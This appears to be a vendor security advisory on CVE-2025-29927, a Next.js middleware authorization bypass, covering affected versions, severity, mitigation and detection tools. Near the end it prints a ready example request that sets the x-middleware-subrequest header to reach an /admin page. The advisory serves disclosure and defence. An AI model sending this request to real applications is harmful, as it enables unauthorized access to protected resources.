Zhero Web Security discovered an authorization bypass in the popular Next.js full-stack web framework; essentially, this bypass, which affects years of Next.js versions, allows an adversary to bypass permissions by “asking nicely” — specifically, by including a specially-crafted header in web requests to affected applications.
- The issue has been given an NVD entry as CVE-2025-29927
- No official CVSS base score has been calculated at the time of our analysis. Checkmarx Zero’s internal estimate, using CVSSv4, places the likely base score in the range 9.2–9.9. The reporter suggests a CVSSv3 base score of 9.1
- Exploitation of this issue is extremely simple, and is likely to be automated by adversaries
- This issue can be resolved by upgrading Next.js, and can be mitigated by blocking any public requests that contain the `x-middleware-subrequest:` header; this can be done with Web Application Firewalls (WAF), application or web server rules, etc.
- You are potentially affected if you use Next.js and you are using Next.js’ “middleware” functionality to check authentication or authorization, or for any security purpose. Checkmarx Zero has found affected versions in addition to those listed in the CVE advisory. We consider the following versions affected: next.js 11.1.4 through 12.3.5, 13.x prior to 13.5.9, 14.x prior to 14.2.25, 14.3.0-canary.0 through 14.3.0-canary.87, 15.x prior to 15.2.3, and 15.3.0-canary.0 through 15.3.0-canary.11
Overview and Summary of CVE-2025-2992
Next.js is a popular full-stack web development framework based on React; it allows rapid building of web applications using Javascript.
Recently, a critical security vulnerability (CVE-2025-29927) was reported affecting Next.js applications prior to versions 14.2.25 and 15.2.3. Checkmarx Zero’s additional analysis of the vulnerability finds additional affected versions: 11.1.4 through 12.3.5, 13.x prior to 13.5.9, 14.x prior to 14.2.25, 14.3.0-canary.0 through 14.3.0-canary.87, 15.x prior to 15.2.3, and 15.3.0-canary.0 through 15.3.0-canary.11.
This vulnerability allows attackers to bypass authorization checks performed within middleware, potentially enabling unauthorized access to sensitive application resources. Middleware are the pieces of code that run in between requests to handle many use-cases, such as authentication, authorization, logging, and request handling, which plays a pivotal role for security in Next.js applications.
Middleware is used a lot in modern web application development, especially on authentication and authorization issues. Which is why CVE-2025-29927 is so dangerous. It is, in its core, an authorization bypass, since anyone can use it to bypass the application’s “middleware”, and authorization-checking is one of the most common uses of such middleware.
The way the vulnerability works is by exploiting the way Next.js handles the HTTP request header `x-middleware-subrequest`. Attackers craft requests which have this header set to specific middleware identifiers (often `middleware` or `src/middleware`, but it depends on the configuration) to trick the framework into skipping critical middleware logic. By doing so, attackers effectively bypass protections, gaining unauthorized access to restricted parts of the application. Essentially, an adversary can bypass middleware-based authorization “guards” by simply asking politely — it’s like getting into an exclusive club by saying “pretty please?” to the door person!
The impact of such a vulnerability is significant in today’s landscape, where JavaScript frameworks are ubiquitous — in fact, Next.js is the fourth most popular web development framework in the world according to StackOverflow’s 2024 popularity survey. Next.js is the #1 Javascript meta-framework, boasting over 130,000 stars on GitHub, making it the 14th largest project on the entire platform.
The reporter of this vulnerability proposes a CVSSv3 base score of 9.1 (Critical) and reports it affects Next.js versions prior to 14.2.25 and 15.2.3; however Checkmarx Zero’s additional analysis of the vulnerability finds additional affected versions: 11.1.4 through 12.3.5, 13.x prior to 13.5.9, 14.x prior to 14.2.25, 14.3.0-canary.0 through 14.3.0-canary.87, 15.x prior to 15.2.3, and 15.3.0-canary.0 through 15.3.0-canary.11.
How The Next.Js Middleware Bypass Gets Exploited
The key to understanding this vulnerability is understanding the Next.js concept of “middleware” — Next.js applications use components to process incoming requests (which browsers and API clients make on behalf of users) and make various decisions about them before passing them on to the core of the application. These components are called “middleware” in the Next.js framework. One very common use of middleware is to determine whether a given user is authorized to make the request. For example, a application would ask a middleware component to examine whether a user has a valid session and belongs to an administrator group before allowing a request to an admin control panel portion of the application.
This vulnerability allows an adversary to bypass those kinds of checks.
The issue arises from how Next.js processes a specific HTTP header called `x-middleware-subrequest`. Under normal circumstances, this header is internally managed by Next.js to handle sub-requests within middleware, but attackers have discovered that by manually including this header in their requests they could trick Next.js into skipping the current middleware — like an authorization checker — entirely. This would be done by specifying values like `middleware` or `pages/_middleware` in the header’s value. These values come from the internal logic of the way middleware are processed under the hood.
In Next.js, the middleware sits in the path of the incoming HTTP requests and acts like a gate keeper. It examines the request before they reach other parts of the application, ensuring that they are legitimate, safe, the user has the correct permissions or even just follows any conventions needed and set by the middleware. This “gate-keeper” capability means middleware is often used to check authentication and authorization, among other security checks. The vulnerability occurs because Next.js tries to detect and prevent infinite loops caused by middleware repeatedly calling itself, by using the `x-middleware-subrequest` header as an internal indicator. Unfortunately, due to the inherent trust Next.js places in this header, an attacker can simply send a malicious request by explicitly setting this header, effectively tricking the server into assuming it’s already been through the middleware, bypassing any checks entirely.
Imagine the middleware as a security guard at the entrance to an exclusive event, carefully checking every guest’s invitation (their authorization cookies for example). Now, imagine that someone just confidently walks in and holds up a badge that says, “I’ve already been checked.” (the `x-middleware-subrequest` header) and just strolls right past security? That’s exactly what is happening here. By exploiting the framework’s trust in its own internal signal `x-middleware-subrequest `, the attacker effectively bypasses the guard without doing any actual verification of his credentials.
GET /admin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: some-vulnerable-nextjs-app[.]com
x-middleware-subrequest: pages/_middlewareThe original issue reporters have an excellent, technical walkthrough of this vulnerability and attack tactic on their blog.
Are You Affected?
Use the Checkmarx Software Composition Analysis (SCA) tool to quickly identify any of your code projects that are affected by CVE-2025-29927, check for vulnerable Next.js versions, and guide you through remediation steps to secure your applications.
The team at ProjectDiscovery has also released a free Nuclei template that anyone can use to check if your applications are affected by this vulnerability. This works by checking the versions of Next.js that are in use in your application and flagging them accordingly.